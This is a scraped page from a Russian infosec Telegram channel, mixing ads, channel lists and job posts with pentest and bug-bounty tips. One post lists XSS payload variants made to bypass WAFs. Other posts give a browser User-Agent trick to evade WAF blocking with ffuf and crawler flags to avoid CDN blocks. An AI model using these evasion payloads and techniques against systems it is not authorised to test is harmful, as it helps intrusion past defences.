Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.82K photos
93 videos
166 files
2.87K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.me/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
Автор статьи Sergei Vorniches прошел через фриланс, стажировки, корпорации, смену профессии и даже запуск собственного SaaS'а. Очевидно, что за это время он получил много как позитивного, так и негативного опыта. В статье он описывает 5 важных уроков, которые хотел получить 10 лет назад.

💬 Какие из них лично для вас являются наиболее важными в профессии айтишника? Цифру пишите в комментарии👇
✍️Библиотека программиста» находится в поиске автора оригинальных статей

Кто нужен?
● Энтузиасты (джуны и выше), которые держат руку на пульсе, читают помимо книг зарубежные техноблоги
● Энтузиасты, которым есть что сказать

Тематика
● DevOps
● В четырех случаях из пяти вы предлагаете тему статьи

Объем
● От 7 до 15 тыс. знаков без учета кода
● 2-3 статьи в месяц

Оплата
● 8к руб. за статью
● Работаем с самозанятыми (компенсируем налог), ИП

Я пишу «так себе», что делать?
Чтобы написать статью, которую не стыдно опубликовать, достаточно овладеть инфостилем. У нас есть бесплатный курс для начинающих копирайтеров «Статьи для IT: как объяснять и распространять значимые идеи». Время прохождения курса: 1-2 недели.

✉️Пишите на hello@proglib.io
🤖 XSS Mutation Engine — GPT от jhaddix и Arcanum Information Security, который возьмет стандартную строку атаки и применит мутации для обхода WAF.

Самый простой пример: код для эксплуатации выглядит следующим образом👇


<a href="#" onclick="alert(1)">Click me</a>


... но любую попытку эксплуатации блокирует WAF. Просто отправьте этот пэйлоад боту, чтобы получить на выходе это👇

1.
<a href="#" onload="alert(1)">Click me</a>

2.
<a href="#" onmouseover="alert(1)">Click me</a>

3.
<a href="#" onfocus="alert(1)">Click me</a>

4.
<a href="#" onerror="alert(1)">Click me</a>

5.
<a href="#" onscroll="alert(1)">Click me</a>

6.
<a href="#" onkeydown="alert(1)">Click me</a>

7.
<a href="#" onkeyup="alert(1)">Click me</a>

8.
<a href="#" onblur="alert(1)">Click me</a>

9.
<a href="#" onmouseout="alert(1)">Click me</a>

10.
<a href="#" ondblclick="alert(1)">Click me</a>

11.
<a href="#" onmouseenter="alert(1)">Click me</a>
Самые полезные каналы для программистов в одной подборке!

Сохраняйте себе, чтобы не потерять 💾

🔥Для всех

Библиотека программиста — новости, статьи, досуг, фундаментальные темы
Книги для программистов
IT-мемы
Proglib Academy — тут мы рассказываем про обучение и курсы

🤖Про нейросети
Библиотека робототехники и беспилотников | Роботы, ИИ, интернет вещей
Библиотека нейрозвука | Транскрибация, синтез речи, ИИ-музыка
Библиотека нейротекста | ChatGPT, Gemini, Bing
Библиотека нейровидео | Sora AI, Runway ML, дипфейки
Библиотека нейрокартинок | Midjourney, DALL-E, Stable Diffusion

#️⃣C#

Книги для шарпистов | C#, .NET, F#
Библиотека шарписта — полезные статьи, новости и обучающие материалы по C#
Библиотека задач по C# — код, квизы и тесты
Библиотека собеса по C# — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Вакансии по C#, .NET, Unity Вакансии по PHP, Symfony, Laravel

☁️DevOps

Библиотека devops’а — полезные статьи, новости и обучающие материалы по DevOps
Вакансии по DevOps & SRE
Библиотека задач по DevOps — код, квизы и тесты
Библиотека собеса по DevOps — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования

🐘PHP

Библиотека пхпшника — полезные статьи, новости и обучающие материалы по PHP
Вакансии по PHP, Symfony, Laravel
Библиотека PHP для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по PHP — код, квизы и тесты

🐍Python

Библиотека питониста — полезные статьи, новости и обучающие материалы по Python
Вакансии по питону, Django, Flask
Библиотека Python для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Python — код, квизы и тесты

Java

Книги для джавистов | Java
Библиотека джависта — полезные статьи по Java, новости и обучающие материалы
Библиотека Java для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Java — код, квизы и тесты
Вакансии для java-разработчиков

👾Data Science

Книги для дата сайентистов | Data Science
Библиотека Data Science — полезные статьи, новости и обучающие материалы по Data Science
Библиотека Data Science для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Data Science — код, квизы и тесты
Вакансии по Data Science, анализу данных, аналитике, искусственному интеллекту

🦫Go

Книги для Go разработчиков
Библиотека Go разработчика — полезные статьи, новости и обучающие материалы по Go
Библиотека Go для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Go — код, квизы и тесты
Вакансии по Go

🧠C++

Книги для C/C++ разработчиков
Библиотека C/C++ разработчика — полезные статьи, новости и обучающие материалы по C++
Библиотека C++ для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по C++ — код, квизы и тесты
Вакансии по C++

💻Другие каналы

Библиотека фронтендера
Библиотека мобильного разработчика
Библиотека хакера
Библиотека тестировщика
Вакансии по фронтенду, джаваскрипт, React, Angular, Vue
Вакансии для мобильных разработчиков
Вакансии по QA тестированию
InfoSec Jobs — вакансии по информационной безопасности

📁Чтобы добавить папку с нашими каналами, нажмите 👉сюда👈

Также у нас есть боты:
Бот с IT-вакансиями
Бот с мероприятиями в сфере IT

Мы в других соцсетях:
🔸VK
🔸YouTube
🔸Дзен
🔸Facebook *
🔸Instagram *

* Организация Meta запрещена на территории РФ
🥷 DOM Invader: как найти и проэксплуатировать DOM XSS & Prototype Pollution

Гайд о том, как найти DOM XSS и Prototype Pollution на примере пяти лабораторных и одной уязвимости на Хабре.

Вы узнаете про инструмент DOM Invader, про некоторые причины появления DOM-уязвимостей на примере уязвимого JavaScript-кода.

И самое интересное: какой потенциальный импакт можно показывать команде багбаунти для получения выплаты за Client-Side уязвимость.

👉 Читать

#pentest #bugbounty
🥷 Личный бренд айтишника — тема непростая. Когда сильных хард-скиллов уже недостаточно для роста в карьере, приходится искать способы выразить свою экспертность.

💬 А как вы предпочитаете развивать свой личный бренд?

👍 — публикации на профессиональных площадках
❤️ — преподавание
🔥 — выступления на конференциях/митапах
🤔 — с экспертностью пока есть проблемки
👏 — свой вариант (напишу в комментариях)
Вакансии «Библиотеки программиста» — ждем вас в команде!

Мы постоянно растем и развиваемся, поэтому создали отдельную страницу, на которой будут размещены наши актуальные вакансии. Сейчас мы ищем:
👉авторов в наше медиа proglib.io
👉контент-менеджеров для ведения телеграм-каналов

Подробности тут.

Мы предлагаем частичную занятость и полностью удаленный формат работы — можно совмещать с основной и находиться в любом месте🌴

Ждем ваших откликов 👾
Please open Telegram to view this post
VIEW IN TELEGRAM
🧰 httpstat — любопытный инструмент для проверки HTTP-ответов.

Взгляните на curl по-новому👇

🔗 GitHub

#tools
🤖 Как обучить большую языковую модель?

Вы когда-нибудь задумывались, как люди «точно настраивают» большие языковые модели для конкретных задач? Под катом рассматривается обучение локальной модели и GPT-4, чтобы помочь разобраться в выводе псевдокода в дизассемблере IDA Pro. Модель и код плагина можно найти на aidapal.

👉 Читать

#learning #reverse #tools
🐬🥷 Flipper Zero — мнение пентестера после двух лет «полевой» эксплуатации

«Дельфин-тамагочи» от Flipper Devices Inc. не нуждается в представлении, но хайп вокруг этого хакерского мультитула уже поутих. Теперь пользователи разделились на два лагеря: одни считают Flipper Zero крутым инструментом, другие не понимают, зачем его купили.

Один из пентестеров и социальных инженеров «Бастиона» согласился поделиться впечатлениями от использования этого устройства. Он честно рассказал, полезен ли Flipper для проведения тестов на проникновение, какие задачи позволяет выполнять на объектах клиентов и стоит ли устройство своих денег.

👉 Читать

#pentest #tools
🥷 При использовании ffuf или других инструментов (которые отправляют User-Agent при каждом запросе) никто не задумывается, что используемые по умолчанию HTTP-заголовки (Fuzz Faster U Fool в случае ffuf) могут блокировать WAF. Просто измените его на что-то вроде:


-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"


#bugbounty #tips #recon
🤩 Даже в школе есть безопасники: решаем простые, но интересные CTF-турниры

Под катом вас ждет решение нескольких заданий из разных категорий: OSINT, Misc, Forensic и Web. Некоторые могут показаться простыми, ведь в этой подборке задачи с турниров для старшеклассников и студентов.

👉 Читать

#ctf #wriiteup
🤩 Некоторым багхантерам нравится использовать CLI инструменты-пауки для сбора эндпоинтов. Katana — один из таких пауков, ориентированных на безопасность.

📌 Несколько важных параметров для запуска Katana, которые можно и нужно использовать:

🔷 -headless — для того, чтобы не попасть в блок CDN WAF
🔷 -js-crawl — для парсинга JS
🔷 -jsluice — для анализа синтаксического дерева JS
🔷 -display-out-scope — для того, чтобы узнать, когда паук найдет ссылки на другие домены, которые могут быть связаны с вашей целью

#bugbounty #pentest #tools #recon
🤯 Хотите хардкора? Читайте разбор уязвимости CVE-2022-24834 в контейнере Redis, работающем на Alpine Linux

Уязвимость затрагивает модуль Lua cjson в серверах Redis <= 7.0.11 и представляет собой переполнение целого числа, которое приводит к большому копированию данных (~350 Мб).

👉 Читать

#CVE #writeup
🧑‍💻 Статьи для IT: как объяснять и распространять значимые идеи

Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.

Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.

Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.

👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
💡 Шпаргалка по командам для парсинга логов: на заметку этичному хакеру

На самом деле, не только логов. Эти утилиты/команды часто выручают в ходе разведки, когда надо быстро что-то отсортировать и/или найти!

👉 Источник

#cheatsheet